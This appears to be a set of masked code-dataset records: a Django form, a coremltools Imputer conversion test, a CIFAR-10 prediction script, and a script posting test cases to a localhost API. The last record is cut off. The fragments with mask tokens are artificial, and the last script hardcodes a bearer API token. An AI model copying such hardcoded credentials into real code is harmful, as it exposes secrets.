{ "blob_id": "7c5877eea78c3fa8b7928219edd52e2502c16c09", "index": 6392, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass TeacherForm(forms.Form):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass TeacherForm(forms.Form):\n name = forms.CharField(label='Your Name', max_length=100, widget=forms.\n TextInput(attrs={'class': 'form-control text-center w-75 mx-auto'}))\n email = forms.EmailField(widget=forms.TextInput(attrs={'class':\n 'form-control text-center w-75 mx-auto'}))\n", "step-4": "from django import forms\n\n\nclass TeacherForm(forms.Form):\n name = forms.CharField(label='Your Name', max_length=100, widget=forms.\n TextInput(attrs={'class': 'form-control text-center w-75 mx-auto'}))\n email = forms.EmailField(widget=forms.TextInput(attrs={'class':\n 'form-control text-center w-75 mx-auto'}))\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Copyright (c) 2017, Apple Inc. All rights reserved. # # Use of this source code is governed by a BSD-3-clause license that can be # found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause import unittest from distutils.version import StrictVersion import numpy as np from coremltools._deps import _HAS_SKLEARN, _SKLEARN_VERSION if _HAS_SKLEARN: import sklearn from coremltools.converters import sklearn as converter try: # scikit-learn >= 0.21 from sklearn.impute import SimpleImputer as Imputer sklearn_class = sklearn.impute.SimpleImputer except ImportError: # scikit-learn < 0.21 from sklearn.preprocessing import Imputer sklearn_class = sklearn.preprocessing.Imputer @unittest.skipIf(not _HAS_SKLEARN, "Missing sklearn. Skipping tests.") class ImputerTestCase(unittest.TestCase): """ Unit test class for testing scikit-learn converter. """ @classmethod def setUpClass(self): """ Set up the unit test by loading the dataset and training a model. """ from sklearn.datasets import load_boston scikit_data = load_boston() # axis parameter deprecated in SimpleImputer >= 0.22. which now imputes # only along columns as desired here. 
if _SKLEARN_VERSION >= StrictVersion("0.22"): scikit_model = Imputer(strategy="most_frequent") else: scikit_model = Imputer(strategy="most_frequent", axis=0) scikit_data["data"][1, 8] = np.NaN input_data = scikit_data["data"][:, 8].reshape(-1, 1) scikit_model.fit(input_data, scikit_data["target"]) # Save the data and the model self.scikit_data = scikit_data self.scikit_model = scikit_model def test_conversion(self): spec = converter.convert(self.scikit_model, "data", "out").get_spec() self.assertIsNotNone(spec) # Test the model class self.assertIsNotNone(spec.description) # Test the interface self.assertTrue(spec.pipeline.models[-1].HasField("imputer")) def test_conversion_bad_inputs(self): # Error on converting an untrained model with self.assertRaises(Exception): model = Imputer() spec = converter.convert(model, "data", "out") # Check the expected class during covnersion. with self.assertRaises(Exception): from sklearn.linear_model import LinearRegression model = LinearRegression() spec = converter.convert(model, "data", "out")
normal
{ "blob_id": "d3d90b8ccd0ec449c84ac0316c429b33353f4518", "index": 8900, "step-1": "<mask token>\n\n\n@unittest.skipIf(not _HAS_SKLEARN, 'Missing sklearn. Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n <mask token>\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n", "step-2": "<mask token>\n\n\n@unittest.skipIf(not _HAS_SKLEARN, 'Missing sklearn. 
Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n", "step-3": "<mask token>\nif _HAS_SKLEARN:\n import sklearn\n from coremltools.converters import sklearn as converter\n try:\n from sklearn.impute import SimpleImputer as Imputer\n sklearn_class = sklearn.impute.SimpleImputer\n except ImportError:\n from sklearn.preprocessing import Imputer\n sklearn_class = sklearn.preprocessing.Imputer\n\n\n@unittest.skipIf(not _HAS_SKLEARN, 'Missing sklearn. 
Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n", "step-4": "import unittest\nfrom distutils.version import StrictVersion\nimport numpy as np\nfrom coremltools._deps import _HAS_SKLEARN, _SKLEARN_VERSION\nif _HAS_SKLEARN:\n import sklearn\n from coremltools.converters import sklearn as converter\n try:\n from sklearn.impute import SimpleImputer as Imputer\n sklearn_class = sklearn.impute.SimpleImputer\n except ImportError:\n from sklearn.preprocessing import Imputer\n sklearn_class = sklearn.preprocessing.Imputer\n\n\n@unittest.skipIf(not _HAS_SKLEARN, 'Missing sklearn. 
Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n", "step-5": "# Copyright (c) 2017, Apple Inc. 
All rights reserved.\n#\n# Use of this source code is governed by a BSD-3-clause license that can be\n# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause\n\nimport unittest\nfrom distutils.version import StrictVersion\n\nimport numpy as np\n\nfrom coremltools._deps import _HAS_SKLEARN, _SKLEARN_VERSION\n\nif _HAS_SKLEARN:\n import sklearn\n\n from coremltools.converters import sklearn as converter\n try:\n # scikit-learn >= 0.21\n from sklearn.impute import SimpleImputer as Imputer\n\n sklearn_class = sklearn.impute.SimpleImputer\n except ImportError:\n # scikit-learn < 0.21\n from sklearn.preprocessing import Imputer\n\n sklearn_class = sklearn.preprocessing.Imputer\n\n@unittest.skipIf(not _HAS_SKLEARN, \"Missing sklearn. Skipping tests.\")\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n\n scikit_data = load_boston()\n # axis parameter deprecated in SimpleImputer >= 0.22. 
which now imputes\n # only along columns as desired here.\n if _SKLEARN_VERSION >= StrictVersion(\"0.22\"):\n scikit_model = Imputer(strategy=\"most_frequent\")\n else:\n scikit_model = Imputer(strategy=\"most_frequent\", axis=0)\n scikit_data[\"data\"][1, 8] = np.NaN\n\n input_data = scikit_data[\"data\"][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data[\"target\"])\n\n # Save the data and the model\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, \"data\", \"out\").get_spec()\n self.assertIsNotNone(spec)\n\n # Test the model class\n self.assertIsNotNone(spec.description)\n\n # Test the interface\n self.assertTrue(spec.pipeline.models[-1].HasField(\"imputer\"))\n\n def test_conversion_bad_inputs(self):\n # Error on converting an untrained model\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, \"data\", \"out\")\n\n # Check the expected class during covnersion.\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n\n model = LinearRegression()\n spec = converter.convert(model, \"data\", \"out\")\n", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> for i in arr: img = cv2.imread(i) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) img = cv2.resize(img, (32, 32)) img = img_to_array(img) img = np.expand_dims(img, axis=0) k = model.predict(img)[0] k = np.argmax(k) result.append(class_names[k]) print(i) <|reserved_special_token_0|> df.to_csv( 'E:\\AI Application Implementation\\trained_model\\Classification\\Cifar-10\\sub.csv' , index=False) <|reserved_special_token_1|> <|reserved_special_token_0|> model = load_model( 'E:/AI Application Implementation/trained_model/Classification/Cifar-10/cifar-2.h5' ) class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'] arr = os.listdir() result = [] for i in arr: img = cv2.imread(i) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) img = cv2.resize(img, (32, 32)) img = img_to_array(img) img = np.expand_dims(img, axis=0) k = model.predict(img)[0] k = np.argmax(k) result.append(class_names[k]) print(i) dict = {'filename': arr, 'label': result} <|reserved_special_token_0|> df = pd.DataFrame(dict) df.to_csv( 'E:\\AI Application Implementation\\trained_model\\Classification\\Cifar-10\\sub.csv' , index=False) <|reserved_special_token_1|> <|reserved_special_token_0|> from tensorflow.keras.models import load_model import cv2 import os from tensorflow.keras.preprocessing.image import img_to_array import numpy as np model = load_model( 'E:/AI Application Implementation/trained_model/Classification/Cifar-10/cifar-2.h5' ) class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'] arr = os.listdir() result = [] for i in arr: img = cv2.imread(i) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) img = cv2.resize(img, (32, 32)) img = img_to_array(img) img = np.expand_dims(img, axis=0) k = model.predict(img)[0] k = np.argmax(k) result.append(class_names[k]) print(i) dict = {'filename': arr, 'label': result} import pandas as pd df = 
pd.DataFrame(dict) df.to_csv( 'E:\\AI Application Implementation\\trained_model\\Classification\\Cifar-10\\sub.csv' , index=False) <|reserved_special_token_1|> # -*- coding: utf-8 -*- """ Created on Wed Aug 19 05:29:19 2020 @author: Gaurav """ from tensorflow.keras.models import load_model import cv2 import os from tensorflow.keras.preprocessing.image import img_to_array import numpy as np model=load_model('E:/AI Application Implementation/trained_model/Classification/Cifar-10/cifar-2.h5') class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'] # img = cv2.imread("00004_test.png") # img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # img = cv2.resize(img, (32, 32)) # img = img_to_array(img) # img = np.expand_dims(img, axis=0) # k = model.predict(img)[0] # k=np.argmax(k) # print(class_names[k]) arr = os.listdir() result=[] for i in arr: img = cv2.imread(i) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) img = cv2.resize(img, (32, 32)) img = img_to_array(img) img = np.expand_dims(img, axis=0) k = model.predict(img)[0] k=np.argmax(k) result.append(class_names[k]) print(i) dict={"filename":arr,'label':result} import pandas as pd df=pd.DataFrame(dict) df.to_csv(r"E:\AI Application Implementation\trained_model\Classification\Cifar-10\sub.csv",index=False) # df=pd.read_csv("E:/AI Application Implementation/trained_model/Classification/Cifar-10/sub.csv") # df.to_csv(r"E:\AI Application Implementation\trained_model\Classification\Cifar-10\sub.csv",index=False)
flexible
{ "blob_id": "c3e2bd635a7ff558ed56e7fb35e8b10e1c660c88", "index": 6804, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in arr:\n img = cv2.imread(i)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, (32, 32))\n img = img_to_array(img)\n img = np.expand_dims(img, axis=0)\n k = model.predict(img)[0]\n k = np.argmax(k)\n result.append(class_names[k])\n print(i)\n<mask token>\ndf.to_csv(\n 'E:\\\\AI Application Implementation\\\\trained_model\\\\Classification\\\\Cifar-10\\\\sub.csv'\n , index=False)\n", "step-3": "<mask token>\nmodel = load_model(\n 'E:/AI Application Implementation/trained_model/Classification/Cifar-10/cifar-2.h5'\n )\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog',\n 'frog', 'horse', 'ship', 'truck']\narr = os.listdir()\nresult = []\nfor i in arr:\n img = cv2.imread(i)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, (32, 32))\n img = img_to_array(img)\n img = np.expand_dims(img, axis=0)\n k = model.predict(img)[0]\n k = np.argmax(k)\n result.append(class_names[k])\n print(i)\ndict = {'filename': arr, 'label': result}\n<mask token>\ndf = pd.DataFrame(dict)\ndf.to_csv(\n 'E:\\\\AI Application Implementation\\\\trained_model\\\\Classification\\\\Cifar-10\\\\sub.csv'\n , index=False)\n", "step-4": "<mask token>\nfrom tensorflow.keras.models import load_model\nimport cv2\nimport os\nfrom tensorflow.keras.preprocessing.image import img_to_array\nimport numpy as np\nmodel = load_model(\n 'E:/AI Application Implementation/trained_model/Classification/Cifar-10/cifar-2.h5'\n )\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog',\n 'frog', 'horse', 'ship', 'truck']\narr = os.listdir()\nresult = []\nfor i in arr:\n img = cv2.imread(i)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, (32, 32))\n img = img_to_array(img)\n img = np.expand_dims(img, axis=0)\n k = model.predict(img)[0]\n k = np.argmax(k)\n result.append(class_names[k])\n print(i)\ndict = 
{'filename': arr, 'label': result}\nimport pandas as pd\ndf = pd.DataFrame(dict)\ndf.to_csv(\n 'E:\\\\AI Application Implementation\\\\trained_model\\\\Classification\\\\Cifar-10\\\\sub.csv'\n , index=False)\n", "step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Aug 19 05:29:19 2020\r\n\r\n@author: Gaurav\r\n\"\"\"\r\nfrom tensorflow.keras.models import load_model\r\nimport cv2\r\nimport os\r\nfrom tensorflow.keras.preprocessing.image import img_to_array\r\nimport numpy as np\r\n\r\nmodel=load_model('E:/AI Application Implementation/trained_model/Classification/Cifar-10/cifar-2.h5')\r\n\r\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer',\r\n 'dog', 'frog', 'horse', 'ship', 'truck']\r\n\r\n# img = cv2.imread(\"00004_test.png\")\r\n# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n# img = cv2.resize(img, (32, 32))\r\n# img = img_to_array(img)\r\n# img = np.expand_dims(img, axis=0)\r\n# k = model.predict(img)[0]\r\n# k=np.argmax(k)\r\n# print(class_names[k])\r\n\r\narr = os.listdir()\r\nresult=[]\r\nfor i in arr:\r\n img = cv2.imread(i)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n img = cv2.resize(img, (32, 32))\r\n img = img_to_array(img)\r\n img = np.expand_dims(img, axis=0)\r\n k = model.predict(img)[0]\r\n k=np.argmax(k)\r\n result.append(class_names[k])\r\n print(i)\r\n \r\n \r\ndict={\"filename\":arr,'label':result}\r\nimport pandas as pd\r\ndf=pd.DataFrame(dict)\r\ndf.to_csv(r\"E:\\AI Application Implementation\\trained_model\\Classification\\Cifar-10\\sub.csv\",index=False)\r\n\r\n# df=pd.read_csv(\"E:/AI Application Implementation/trained_model/Classification/Cifar-10/sub.csv\")\r\n# df.to_csv(r\"E:\\AI Application Implementation\\trained_model\\Classification\\Cifar-10\\sub.csv\",index=False)\r\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> conn.request('POST', '/api/v1/testsuites', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testsuites', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testsuites', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', 
'/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testsuites', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testsuites', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_1|> <|reserved_special_token_0|> host = 'localhost:8000' api_token = 'fuukp8LhdxxwoVdtJu5K8LQtpTods8ddLMq66wSUFXGsqJKpmJAa1YyqkHN3' conn = http.client.HTTPConnection(host) headers = {'authorization': 'Bearer ' + api_token, 'content-type': 'application/json', 'cache-control': 'no-cache', 'postman-token': '44709a5c-ca4a-bbce-4b24-f0632a29bde4'} payload = """{ "Name": "Create and edit project" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() 
payload = """{ "Name": "Create and edit requirement" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Not selected project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Create project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Create project without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Check if overview contains project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Edit project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Create project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Create requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Create requirement without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Overview contains requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Edit requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Cover requirement" }""" conn.request('POST', 
'/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Create and edit TestSuites and TestCase" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test suite" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test suite without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Check if overview contains suite" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Edit test suite" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test case without details" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test case with details" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test case without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Check if overview contains case" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Edit test case" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Create test set and run" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = 
conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create set" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Overview contains set" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create set without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create set without tests" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Edit test set" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create test run" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Overview contains run" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Execute contains tests" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Registration and log test" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Redirect to login page" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Registration" }""" conn.request('POST', 
'/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Registrate same user" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Log and logout" }""" conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_1|> import http.client host = 'localhost:8000' api_token = 'fuukp8LhdxxwoVdtJu5K8LQtpTods8ddLMq66wSUFXGsqJKpmJAa1YyqkHN3' conn = http.client.HTTPConnection(host) headers = {'authorization': 'Bearer ' + api_token, 'content-type': 'application/json', 'cache-control': 'no-cache', 'postman-token': '44709a5c-ca4a-bbce-4b24-f0632a29bde4'} payload = """{ "Name": "Create and edit project" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Create and edit requirement" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Not selected project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Create project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Create project without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Check if overview contains project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Edit project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Create project" }""" 
conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Create requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Create requirement without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Overview contains requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Edit requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Cover requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Create and edit TestSuites and TestCase" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test suite" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test suite without name" }""" conn.request('POST', '/api/v1/testcases', payload, 